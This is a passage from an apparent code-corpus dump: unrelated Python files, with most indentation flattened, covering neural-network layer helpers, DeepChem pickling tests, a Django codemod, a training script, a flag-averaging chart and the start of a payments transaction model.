out, relu_cache = relu_forward(a)
cache = (fc_cache, relu_cache)
return out, cache
def affine_relu_backward(dout, cache):
"""
Backward pass for the affine-relu convenience layer
"""
fc_cache, relu_cache = cache
da = relu_backward(dout, relu_cache)
dx, dw, db = affine_backward(da, fc_cache)
return dx, dw, db
def affine_batch_norm_relu_forward(x,w,b,gamma,beta,bn_params):
"""
Our layer that performs batch normalization after affine and then relu
Inputs:
- x: Input to the affine layer
- w, b: Weights for the affine layer
- gamma, beta : Weight for the batch norm regularization
- bn_params : Contain variable use to batch norml, running_mean and var
Returns a tuple of:
- out: Output from the ReLU
- cache: Object to give to the backward pass
"""
a,fc_cache = affine_forward(x,w,b)
    a_bn, batch_norm_cache = batchnorm_forward(a, gamma, beta, bn_params)
    out, relu_cache = relu_forward(a_bn)
cache = (fc_cache,batch_norm_cache,relu_cache)
return out,cache
def affine_batch_norm_relu_backward(dout,cache):
"""
Backward pass for our affine-norm-relu convenience layer
"""
fc_cache,batch_norm_cache,relu_cache = cache
da = relu_backward(dout,relu_cache)
db_norm,dgamma,dbeta = batchnorm_backward(da,batch_norm_cache)
dx,dw,db = affine_backward(db_norm,fc_cache)
return dx,dw,db,dgamma,dbeta
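# A short usage sketch of the custom affine-batchnorm-relu pair above (shapes and
# bn_params are hypothetical; bn_params is the dict expected by batchnorm_forward):
#   out, cache = affine_batch_norm_relu_forward(x, w, b, gamma, beta, {'mode': 'train'})
#   dx, dw, db, dgamma, dbeta = affine_batch_norm_relu_backward(dout, cache)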
def conv_relu_forward(x, w, b, conv_param):
"""
A convenience layer that performs a convolution followed by a ReLU.
Inputs:
- x: Input to the convolutional layer
- w, b, conv_param: Weights and parameters for the convolutional layer
Returns a tuple of:
- out: Output from the ReLU
- cache: Object to give to the backward pass
"""
a, conv_cache = conv_forward_fast(x, w, b, conv_param)
out, relu_cache = relu_forward(a)
cache = (conv_cache, relu_cache)
return out, cache
def conv_relu_backward(dout, cache):
"""
Backward pass for the conv-relu convenience layer.
"""
conv_cache, relu_cache = cache
da = relu_backward(dout, relu_cache)
dx, dw, db = conv_backward_fast(da, conv_cache)
return dx, dw, db
def conv_relu_pool_forward(x, w, b, conv_param, pool_param):
"""
Convenience layer that performs a convolution, a ReLU, and a pool.
Inputs:
- x: Input to the convolutional layer
- w, b, conv_param: Weights and parameters for the convolutional layer
- pool_param: Parameters for the pooling layer
Returns a tuple of:
- out: Output from the pooling layer
- cache: Object to give to the backward pass
"""
a, conv_cache = conv_forward_fast(x, w, b, conv_param)
s, relu_cache = relu_forward(a)
out, pool_cache = max_pool_forward_fast(s, pool_param)
cache = (conv_cache, relu_cache, pool_cache)
return out, cache
def conv_relu_pool_backward(dout, cache):
"""
Backward pass for the conv-relu-pool convenience layer
"""
conv_cache, relu_cache, pool_cache = cache
ds = max_pool_backward_fast(dout, pool_cache)
da = relu_backward(ds, relu_cache)
dx, dw, db = conv_backward_fast(da, conv_cache)
return dx, dw, db
|
1620549
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^apply/$', views.coupon_apply, name='apply'),
]
|
1620578
|
import numpy as np
import tensorflow as tf
from deepchem.models import TensorGraph
from deepchem.models.tensorgraph.layers import Feature, Conv1D, Dense, Flatten, Reshape, Squeeze, Transpose, \
CombineMeanStd, Repeat, GRU, L2Loss, Concat, SoftMax, Constant, Variable, Add, Multiply, InteratomicL2Distances, \
SoftMaxCrossEntropy, ReduceMean, ToFloat, ReduceSquareDifference, Conv2D, MaxPool, ReduceSum, GraphConv, GraphPool, \
GraphGather, BatchNorm, WeightedError
from deepchem.models.tensorgraph.graph_layers import Combine_AP, Separate_AP, \
WeaveLayer, WeaveGather, DTNNEmbedding, DTNNGather, DTNNStep, \
DTNNExtract, DAGLayer, DAGGather, MessagePassing, SetGather
def test_Conv1D_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1, 1))
conv = Conv1D(2, 1, in_layers=feature)
tg.add_output(conv)
tg.set_loss(conv)
tg.build()
tg.save()
def test_Dense_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
dense = Dense(out_channels=1, in_layers=feature)
tg.add_output(dense)
tg.set_loss(dense)
tg.build()
tg.save()
def test_Flatten_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Flatten(in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Reshape_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Reshape(shape=(-1, 2), in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Squeeze_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Squeeze(squeeze_dims=-1, in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Transpose_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Transpose(perm=(1, 0), in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_CombineMeanStd_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = CombineMeanStd(in_layers=[feature, feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Repeat_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Repeat(n_times=10, in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_GRU_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 10, 10))
layer = GRU(n_hidden=10, batch_size=tg.batch_size, in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_L2loss_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = L2Loss(in_layers=[feature, feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Softmax_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = SoftMax(in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Concat_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Concat(in_layers=[feature, feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Constant_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Constant(np.expand_dims([17] * tg.batch_size, -1))
output = Add(in_layers=[feature, layer])
tg.add_output(output)
tg.set_loss(output)
tg.build()
tg.save()
def test_Variable_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = Variable(np.expand_dims([17] * tg.batch_size, -1))
output = Multiply(in_layers=[feature, layer])
tg.add_output(output)
tg.set_loss(output)
tg.build()
tg.save()
def testInteratomicL2Distances():
"""
TODO(LESWING) what is ndim here?
:return:
"""
tg = TensorGraph()
n_atoms = tg.batch_size
M_nbrs = 4
n_dim = 3
feature = Feature(shape=(tg.batch_size, 3))
neighbors = Feature(shape=(tg.batch_size, M_nbrs), dtype=tf.int32)
layer = InteratomicL2Distances(
N_atoms=n_atoms,
M_nbrs=M_nbrs,
ndim=n_dim,
in_layers=[feature, neighbors])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_SoftmaxCrossEntropy_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = SoftMaxCrossEntropy(in_layers=[feature, feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_ReduceMean_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = ReduceMean(in_layers=[feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_ToFloat_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = ToFloat(in_layers=[feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_ReduceSum_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = ReduceSum(in_layers=[feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_ReduceSquareDifference_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = ReduceSquareDifference(in_layers=[feature, feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Conv2D_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 10, 10))
layer = Conv2D(num_outputs=3, in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_MaxPool_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 10, 10, 10))
layer = MaxPool(in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_GraphConv_pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 75))
degree_slice = Feature(shape=(None, 2), dtype=tf.int32)
membership = Feature(shape=(None,), dtype=tf.int32)
deg_adjs = []
for i in range(0, 10 + 1):
deg_adj = Feature(shape=(None, i + 1), dtype=tf.int32)
deg_adjs.append(deg_adj)
layer = GraphConv(
64,
activation_fn=tf.nn.relu,
in_layers=[atom_features, degree_slice, membership] + deg_adjs)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_GraphPool_Pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 75))
degree_slice = Feature(shape=(None, 2), dtype=tf.int32)
membership = Feature(shape=(None,), dtype=tf.int32)
deg_adjs = []
for i in range(0, 10 + 1):
deg_adj = Feature(shape=(None, i + 1), dtype=tf.int32)
deg_adjs.append(deg_adj)
layer = GraphPool(
in_layers=[atom_features, degree_slice, membership] + deg_adjs)
tg.set_loss(layer)
tg.build()
tg.save()
def test_GraphGather_Pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 75))
degree_slice = Feature(shape=(None, 2), dtype=tf.int32)
membership = Feature(shape=(None,), dtype=tf.int32)
deg_adjs = []
for i in range(0, 10 + 1):
deg_adj = Feature(shape=(None, i + 1), dtype=tf.int32)
deg_adjs.append(deg_adj)
layer = GraphGather(
batch_size=tg.batch_size,
activation_fn=tf.nn.tanh,
in_layers=[atom_features, degree_slice, membership] + deg_adjs)
tg.set_loss(layer)
tg.build()
tg.save()
def test_BatchNorm_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 10))
layer = BatchNorm(in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_WeightedError_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 10))
layer = WeightedError(in_layers=[feature, feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Combine_Separate_AP_pickle():
tg = TensorGraph()
atom_feature = Feature(shape=(None, 10))
pair_feature = Feature(shape=(None, 5))
C_AP = Combine_AP(in_layers=[atom_feature, pair_feature])
S_AP = Separate_AP(in_layers=[C_AP])
tg.add_output(S_AP)
tg.set_loss(S_AP)
tg.build()
tg.save()
def test_Weave_pickle():
tg = TensorGraph()
atom_feature = Feature(shape=(None, 75))
pair_feature = Feature(shape=(None, 14))
pair_split = Feature(shape=(None,), dtype=tf.int32)
atom_to_pair = Feature(shape=(None, 2), dtype=tf.int32)
C_AP = Combine_AP(in_layers=[atom_feature, pair_feature])
weave = WeaveLayer(in_layers=[C_AP, pair_split, atom_to_pair])
tg.add_output(weave)
tg.set_loss(weave)
tg.build()
tg.save()
def test_WeaveGather_pickle():
tg = TensorGraph()
atom_feature = Feature(shape=(None, 75))
atom_split = Feature(shape=(None,), dtype=tf.int32)
weave_gather = WeaveGather(
32, gaussian_expand=True, in_layers=[atom_feature, atom_split])
tg.add_output(weave_gather)
tg.set_loss(weave_gather)
tg.build()
tg.save()
def test_DTNNEmbedding_pickle():
tg = TensorGraph()
atom_numbers = Feature(shape=(None, 23), dtype=tf.int32)
Embedding = DTNNEmbedding(in_layers=[atom_numbers])
tg.add_output(Embedding)
tg.set_loss(Embedding)
tg.build()
tg.save()
def test_DTNNStep_pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 30))
distance = Feature(shape=(None, 100))
distance_membership_i = Feature(shape=(None,), dtype=tf.int32)
distance_membership_j = Feature(shape=(None,), dtype=tf.int32)
DTNN = DTNNStep(in_layers=[
atom_features, distance, distance_membership_i, distance_membership_j
])
tg.add_output(DTNN)
tg.set_loss(DTNN)
tg.build()
tg.save()
def test_DTNNGather_pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 30))
atom_membership = Feature(shape=(None,), dtype=tf.int32)
Gather = DTNNGather(in_layers=[atom_features, atom_membership])
tg.add_output(Gather)
tg.set_loss(Gather)
tg.build()
tg.save()
def test_DTNNExtract_pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 30))
Ext = DTNNExtract(0, in_layers=[atom_features])
tg.add_output(Ext)
tg.set_loss(Ext)
tg.build()
tg.save()
def test_DAGLayer_pickle():
tg = TensorGraph(use_queue=False)
atom_features = Feature(shape=(None, 75))
parents = Feature(shape=(None, 50, 50), dtype=tf.int32)
calculation_orders = Feature(shape=(None, 50), dtype=tf.int32)
calculation_masks = Feature(shape=(None, 50), dtype=tf.bool)
n_atoms = Feature(shape=(), dtype=tf.int32)
DAG = DAGLayer(in_layers=[
atom_features, parents, calculation_orders, calculation_masks, n_atoms
])
tg.add_output(DAG)
tg.set_loss(DAG)
tg.build()
tg.save()
def test_DAGGather_pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 30))
membership = Feature(shape=(None,), dtype=tf.int32)
Gather = DAGGather(in_layers=[atom_features, membership])
tg.add_output(Gather)
tg.set_loss(Gather)
tg.build()
tg.save()
def test_MP_pickle():
tg = TensorGraph()
atom_feature = Feature(shape=(None, 75))
pair_feature = Feature(shape=(None, 14))
atom_to_pair = Feature(shape=(None, 2), dtype=tf.int32)
MP = MessagePassing(5, in_layers=[atom_feature, pair_feature, atom_to_pair])
tg.add_output(MP)
tg.set_loss(MP)
tg.build()
tg.save()
def test_SetGather_pickle():
tg = TensorGraph()
atom_feature = Feature(shape=(None, 100))
atom_split = Feature(shape=(None,), dtype=tf.int32)
Gather = SetGather(5, 16, in_layers=[atom_feature, atom_split])
tg.add_output(Gather)
tg.set_loss(Gather)
tg.build()
tg.save()
|
1620584
|
from typing import Generator, Optional, Sequence, Union
from libcst import (
Assign,
AssignTarget,
Decorator,
FlattenSentinel,
ImportFrom,
ImportStar,
Module,
Name,
RemovalSentinel,
)
from libcst import matchers as m
from django_codemod.constants import DJANGO_1_9, DJANGO_2_0
from django_codemod.visitors.base import BaseDjCodemodTransformer, import_from_matches
class AssignmentTagTransformer(BaseDjCodemodTransformer):
"""Replace `assignment_tag` by `simple_tag`."""
deprecated_in = DJANGO_1_9
removed_in = DJANGO_2_0
ctx_key_prefix = "AssignmentTagTransformer"
ctx_key_library_call_matcher = f"{ctx_key_prefix}-library_call_matcher"
ctx_key_decorator_matcher = f"{ctx_key_prefix}-decorator_matcher"
@property
def library_call_matcher(self) -> Optional[m.Call]:
return self.context.scratch.get(self.ctx_key_library_call_matcher, None)
@property
def decorators_matcher(self) -> Optional[m.BaseMatcherNode]:
return self.context.scratch.get(self.ctx_key_decorator_matcher, None)
def leave_Module(self, original_node: Module, updated_node: Module) -> Module:
"""Clear context when leaving module."""
self.context.scratch.pop(self.ctx_key_library_call_matcher, None)
self.context.scratch.pop(self.ctx_key_decorator_matcher, None)
return super().leave_Module(original_node, updated_node)
def visit_ImportFrom(self, node: ImportFrom) -> Optional[bool]:
"""Record whether an interesting import is detected."""
import_matcher = (
# django.template
self._template_import_matcher(node)
# django.template.Library
or self._library_import_matcher(node)
)
if import_matcher:
self.context.scratch[self.ctx_key_library_call_matcher] = import_matcher
return None
def _template_import_matcher(self, node: ImportFrom) -> Optional[m.Call]:
"""Return matcher if django.template is imported."""
imported_name_str = self._get_imported_name(node, "django.template")
if not imported_name_str:
return None
# Build the `Call` matcher to look out for, e.g. `template.Library()`
return m.Call(
func=m.Attribute(
attr=m.Name("Library"), value=m.Name(value=imported_name_str)
)
)
def _library_import_matcher(self, node: ImportFrom) -> Optional[m.Call]:
"""Return matcher if django.template.Library is imported."""
imported_name_str = self._get_imported_name(node, "django.template.Library")
if not imported_name_str:
return None
# Build the `Call` matcher to look out for, e.g. `Library()`
return m.Call(func=m.Name(imported_name_str))
@staticmethod
def _get_imported_name(node: ImportFrom, import_path: str) -> Optional[str]:
"""Resolve the imported name if present."""
if isinstance(node.names, ImportStar):
return None
*modules, name = import_path.split(".")
if not import_from_matches(node, modules):
return None
for import_alias in node.names:
if m.matches(import_alias, m.ImportAlias(name=m.Name(name))):
# We're visiting the import statement we're looking for
# Get the actual name it's imported as (in case of import alias)
imported_name_str = (
import_alias.evaluated_alias or import_alias.evaluated_name
)
return imported_name_str
return None
def visit_Assign(self, node: Assign) -> Optional[bool]:
"""Record variable name the `Library()` call is assigned to."""
if self.library_call_matcher and m.matches(
node,
m.Assign(value=self.library_call_matcher),
):
# Visiting a `register = template.Library()` statement
# Generate decorator matchers based on left hand side names
decorator_matchers = self._gen_decorator_matchers(node.targets)
# should match if any of the decorator matches
self.context.scratch[self.ctx_key_decorator_matcher] = m.OneOf(
*decorator_matchers
)
return super().visit_Assign(node)
@staticmethod
def _gen_decorator_matchers(
assign_targets: Sequence[AssignTarget],
) -> Generator[m.Decorator, None, None]:
"""Generate matchers for all possible decorators."""
for assign_target in assign_targets:
# for each variable it's assigned to
if isinstance(assign_target.target, Name):
# get the name of the target
target_str = assign_target.target.value
# matcher we should use for finding decorators to modify
yield m.Decorator(
decorator=m.Attribute(
value=m.Name(target_str),
attr=m.Name("assignment_tag"),
)
)
def leave_Decorator(
self, original_node: Decorator, updated_node: Decorator
) -> Union[Decorator, FlattenSentinel[Decorator], RemovalSentinel]:
"""Update decorator call if all conditions are met."""
if self.decorators_matcher and m.matches(updated_node, self.decorators_matcher):
# If we have a decorator matcher, and it matches,
# then update the node with new name
updated_decorator = updated_node.decorator.with_changes(
attr=Name("simple_tag")
)
return updated_node.with_changes(decorator=updated_decorator)
return super().leave_Decorator(original_node, updated_node)
|
1620626
|
import re
import os
import yaml
import random
import logging
import shutil
import numpy as np
import oneflow as flow
import argparse
from otrans.model import End2EndModel, LanguageModel
from otrans.train.scheduler import BuildOptimizer, BuildScheduler
from otrans.train.trainer import Trainer
from otrans.utils import count_parameters
from otrans.data.loader import FeatureLoader
def main(args, params, expdir):
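    # Pick a language model or an end-to-end model based on the config's model type,
    # then wire up the optimizer, scheduler and trainer and start training.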
model_type = params["model"]["type"]
if model_type[-2:] == "lm":
model = LanguageModel[model_type](params["model"])
else:
model = End2EndModel[model_type](params["model"])
# Count total parameters
count_parameters(model.named_parameters())
if args.ngpu >= 1:
model.cuda()
logging.info(model)
optimizer = BuildOptimizer[params["train"]["optimizer_type"]](
filter(lambda p: p.requires_grad, model.parameters()),
**params["train"]["optimizer"]
)
logger.info("[Optimizer] Build a %s optimizer!" % params["train"]["optimizer_type"])
scheduler = BuildScheduler[params["train"]["scheduler_type"]](
optimizer, **params["train"]["scheduler"]
)
logger.info("[Scheduler] Build a %s scheduler!" % params["train"]["scheduler_type"])
trainer = Trainer(
params,
model=model,
optimizer=optimizer,
scheduler=scheduler,
expdir=expdir,
ngpu=args.ngpu,
local_rank=args.local_rank,
is_debug=args.debug,
keep_last_n_chkpt=args.keep_last_n_chkpt,
from_epoch=args.from_epoch,
)
train_loader = FeatureLoader(params, "train", ngpu=args.ngpu)
trainer.train(train_loader=train_loader)
import multiprocessing as mp
mp.set_start_method("spawn", True)
parser = argparse.ArgumentParser()
parser.add_argument(
"-c", "--config", type=str, default="egs/aishell/conf/transformer_baseline.yaml"
)
parser.add_argument("-n", "--ngpu", type=int, default=1)
parser.add_argument("-g", "--gpus", type=str, default="0")
parser.add_argument("-r", "--local_rank", type=int, default=0)
parser.add_argument(
"-l", "--logging_level", type=str, default="info", choices=["info", "debug"]
)
parser.add_argument("-lg", "--log_file", type=str, default=None)
parser.add_argument("-dir", "--expdir", type=str, default=None)
parser.add_argument("-debug", "--debug", action="store_true", default=False)
parser.add_argument("-knpt", "--keep_last_n_chkpt", type=int, default=30)
parser.add_argument("-tfs", "--from_step", type=int, default=0)
parser.add_argument("-tfe", "--from_epoch", type=int, default=0)
cmd_args = parser.parse_args()
with open(cmd_args.config, "r") as f:
params = yaml.load(f, Loader=yaml.FullLoader)
if cmd_args.expdir is not None:
expdir = os.path.join(cmd_args.expdir, params["train"]["save_name"])
else:
expdir = os.path.join(
"egs", params["data"]["name"], "exp", params["train"]["save_name"]
)
if not os.path.exists(expdir):
os.makedirs(expdir)
shutil.copy(cmd_args.config, os.path.join(expdir, "config.yaml"))
logging_level = {"info": logging.INFO, "debug": logging.DEBUG}
if cmd_args.log_file is not None:
log_file = cmd_args.log_file
else:
log_file = cmd_args.config.split("/")[-1][:-5] + ".log"
LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
logging.basicConfig(level=logging_level[cmd_args.logging_level], format=LOG_FORMAT)
logger = logging.getLogger(__name__)
if cmd_args.ngpu == 1:
os.environ["CUDA_VISIBLE_DEVICES"] = str(cmd_args.gpus)
logger.info("Set CUDA_VISIBLE_DEVICES as %s" % cmd_args.gpus)
main(cmd_args, params, expdir)
|
1620633
|
from rest_framework import viewsets
from rest_framework import mixins
from .models import Library
from .serializers import LibrarySerializer
from .permissions import IsRegisteredInLibrary
class LibraryViewSet(mixins.RetrieveModelMixin, viewsets.GenericViewSet):
queryset = Library.objects.all()
serializer_class = LibrarySerializer
permission_classes = [IsRegisteredInLibrary]
|
1620640
|
print("This line will be printed.")
x = 1
if x == 1:
# indented four spaces
print("x is 1.")
print("Goodbye, World!")
|
1620643
|
import argparse
from aumbry.cli import upload, edit, view
def parse_arguments(argv=None):
parser = argparse.ArgumentParser(
'aumbry',
description='CLI Tool for Aumbry'
)
    subparsers = parser.add_subparsers(dest='command')
upload.setup_arguments(subparsers)
edit.setup_arguments(subparsers)
view.setup_arguments(subparsers)
return parser.parse_args(argv)
def main(argv=None):
arguments = parse_arguments(argv)
commands = {
'upload': upload.command,
'edit': edit.command,
'view': view.command,
}
return commands[arguments.command](arguments)
|
1620654
|
from rest_framework.status import HTTP_400_BAD_REQUEST
ERROR_GROUP_USER_IS_LAST_ADMIN = (
"ERROR_GROUP_USER_IS_LAST_ADMIN",
HTTP_400_BAD_REQUEST,
"The related user is the last admin in the group. He must delete the group or "
"give someone else admin permissions.",
)
|
1620682
|
from pudzu.charts import *
from pudzu.sandbox.bamboo import *
import scipy.stats
flags = pd.read_csv("../dataviz/datasets/countries.csv").filter_rows("organisations >> un").split_columns('country', "|").explode('country').set_index('country').drop_duplicates(subset='flag', keep='first')
continents = flags.groupby("continent").count().index
SIZE = 100
FLAG_WIDTH = 6*SIZE
BOX_WIDTH = SIZE * 3 // 4
LABEL_FONT = calibri(SIZE, bold=True)
SUB_FONT = partial(calibri, SIZE*2//3)
def flag_image(c):
return Image.from_url_with_cache(flags['flag'][c]).convert("RGBA").remove_transparency("white").convert("RGB")
def label_image(text, align="center"):
return Image.from_text(text.upper().replace(" ","\n"), LABEL_FONT, "black", "white", align=align)
def mean_image(imgs, size):
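    # Average in linear RGB (converting from sRGB first) so the mean isn't darkened by gamma encoding.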
average = ImageColor.from_linear(sum(ImageColor.to_linear(np.array(img.resize(size))) for img in imgs) / len(imgs))
return Image.fromarray(np.uint8(average))
class HeraldicPalette(metaclass=NamedPaletteMeta):
# Omits Murrey and Sanguine (which are very similar to Gules and Purpure) and Cendree and Carnation (which are barely used).
OR = "#fcdd09"
ARGENT = "#ffffff"
AZURE = "#0f47af"
GULES = "#da121a"
PURPURE = "#9116a1"
SABLE = "#000000"
VERT = "#009200"
TENNE = "#804000"
ORANGE = "#ff8000"
CELESTE = "#75aadb"
def mode_image(imgs, size):
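    # Quantize every flag to the heraldic palette, then take the per-pixel modal colour across all flags.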
a = np.stack([np.array(img.to_palette(HeraldicPalette).resize(size)) for img in imgs], axis=-1)
mode = Image.fromarray(scipy.stats.mode(a, -1)[0][...,0], "P")
mode.putpalette(list(generate_leafs(RGBA(col)[:3] for col in list(HeraldicPalette))))
return mode.to_rgba()
def median_image(imgs, size):
a = np.stack([np.array(img.convert("L").resize(size)) for img in imgs], axis=-1)
median = np.median(a, axis=-1)
return Image.fromarray(np.uint8(median), "L").to_rgba()
def median_image_rgb(imgs, size):
imgs = [img.resize(size) for img in imgs]
arrays = [np.stack([np.array(img.getchannel(i)) for img in imgs], axis=-1) for i in range(3)]
medians = [Image.fromarray(np.uint8(np.median(a, axis=-1)), "L") for a in arrays]
return Image.merge("RGB", medians)
def average_flag(df, size, average):
flags = [flag_image(i) for i in df.index]
return average(flags, (size[0]-2,size[1]-2)).pad(1, "black")
def average_flags(label, average):
world = average_flag(flags, (FLAG_WIDTH, FLAG_WIDTH*2//3), average)
continent = [average_flag(flags[flags.continent == continent], (FLAG_WIDTH, FLAG_WIDTH*2//3), average) for continent in continents]
return [label_image(label), world] + continent
array = [[None, label_image("world")] + [label_image(c) for c in continents],
average_flags("mean", mean_image),
average_flags("mode", mode_image),
average_flags("median", median_image_rgb)]
grid = Image.from_array(tmap(list, zip(*array)), bg="white", padding=SIZE // 5, xalign=(1,0.5,0.5,0.5,0.5))
title = Image.from_column([
Image.from_text("Average flags of the world".upper(), calibri(SIZE*2, bold=True), "black", "white"),
Image.from_text("mean versus mode versus median", calibri(SIZE*3//2, italics=True), "black", "white")
], padding=SIZE//10)
descriptions = [
Image.from_markup("Averages flags of the 195 member and observer states of the UN, resized to a constant aspect ratio.", SUB_FONT),
Image.from_markup("**Mean flags** calculated by first converting from sRGB to linear RGB.", SUB_FONT),
Image.from_row([
Image.from_markup("**Modal flags** calculated by first quantizing to heraldic colors: ", SUB_FONT),
Checkers((BOX_WIDTH*len(HeraldicPalette), BOX_WIDTH), GradientColormap(*HeraldicPalette), shape=(len(HeraldicPalette), 1), colors=len(HeraldicPalette)).add_grid((len(HeraldicPalette), 1))]),
Image.from_markup("**Median flags** calculated separately for each RGB channel.", SUB_FONT)]
img = Image.from_column([title, Image.from_column(descriptions, equal_heights=True, xalign=0), grid], padding=SIZE//4, bg="white")
img.place(Image.from_text("/u/Udzu", font("arial", 40), fg="black", bg="white", padding=10).pad((2,2,0,0), "black"), align=1, padding=20, copy=False)
img.save("output/flagsaverage2.png")
# Extras
# array = [[None, label_image("world")] + [label_image(c, "right") for c in continents], average_flags("RGB median", median_image_rgb)]
# grid = Image.from_array(tmap(list, zip(*array)), bg="white", padding=SIZE // 5, xalign=(1,0.5))
|
1620737
|
from typing import List
class SolutionSort:
def longestWord(self, words: List[str]) -> str:
word_set = set(words)
# sort the words on the length and then the lexical word
words.sort(key = lambda s: (-len(s), s))
# Greedily to find the first word that qualifies
for word in words:
if all([word[:k] in word_set for k in range(1, len(word))]):
return word
return ""
class Solution:
def longestWord(self, words: List[str]) -> str:
trie = dict()
trie["$"] = "" # pseudo mark
def update_trie(word, trie):
""" Update the Trie structure with a new word """
for letter in word:
if letter not in trie:
trie[letter] = dict()
trie = trie[letter]
# mark the end of word
trie["$"] = word
for word in words:
update_trie(word, trie)
max_word = ""
def dfs(node):
"""
Traverse the Trie (as Tree) to find the deepest/longest word
"""
nonlocal max_word
# missing a match of word at this prefix
if "$" not in node:
return
if len(node["$"]) > len(max_word):
max_word = node["$"]
elif len(node["$"]) == len(max_word) and node["$"] < max_word:
max_word = node["$"]
for key in node.keys():
if key != "$":
dfs(node[key])
dfs(trie)
return max_word
|
1620761
|
import os
from datetime import datetime
from enum import Enum
from mongoengine import (
DateTimeField,
Document,
DoesNotExist,
IntField,
ListField,
ReferenceField,
StringField,
signals,
)
from stpmex.resources import Orden
from speid import STP_EMPRESA
from speid.exc import MalformedOrderException
from speid.helpers import callback_helper
from speid.processors import stpmex_client
from speid.types import Estado, EventType
from .account import Account
from .base import BaseModel
from .events import Event
from .helpers import (
EnumField,
date_now,
delete_events,
handler,
save_events,
updated_at,
)
SKIP_VALIDATION_PRIOR_SEND_ORDER = (
os.getenv('SKIP_VALIDATION_PRIOR_SEND_ORDER', 'false').lower() == 'true'
)
@handler(signals.pre_save)
def pre_save_transaction(sender, document):
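    # Derive a compound key from the tracking key and the operation date; the unique
    # sparse index on compound_key below rejects duplicate orders.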
date = document.fecha_operacion or datetime.today()
document.compound_key = (
f'{document.clave_rastreo}:{date.strftime("%Y%m%d")}'
)
@updated_at.apply
@save_events.apply
@pre_save_transaction.apply
@delete_events.apply
class Transaction(Document, BaseModel):
created_at = date_now()
updated_at = DateTimeField()
stp_id = IntField()
fecha_operacion = DateTimeField()
institucion_ordenante = StringField()
institucion_beneficiaria = StringField()
clave_rastreo = StringField()
monto = IntField()
nombre_ordenante = StringField()
tipo_cuenta_ordenante = IntField()
cuenta_ordenante = StringField()
rfc_curp_ordenante = StringField()
nombre_beneficiario = StringField()
tipo_cuenta_beneficiario = IntField()
cuenta_beneficiario = StringField()
rfc_curp_beneficiario = StringField()
concepto_pago = StringField()
referencia_numerica = IntField()
empresa = StringField()
estado: Enum = EnumField(Estado, default=Estado.created)
version = IntField()
speid_id = StringField()
folio_origen = StringField()
tipo_pago = IntField()
email_beneficiario = StringField()
tipo_cuenta_beneficiario2 = StringField()
nombre_beneficiario2 = StringField()
cuenta_beneficiario2 = StringField()
rfc_curpBeneficiario2 = StringField()
concepto_pago2 = StringField()
clave_cat_usuario1 = StringField()
clave_cat_usuario2 = StringField()
clave_pago = StringField()
referencia_cobranza = StringField()
tipo_operacion = StringField()
topologia = StringField()
usuario = StringField()
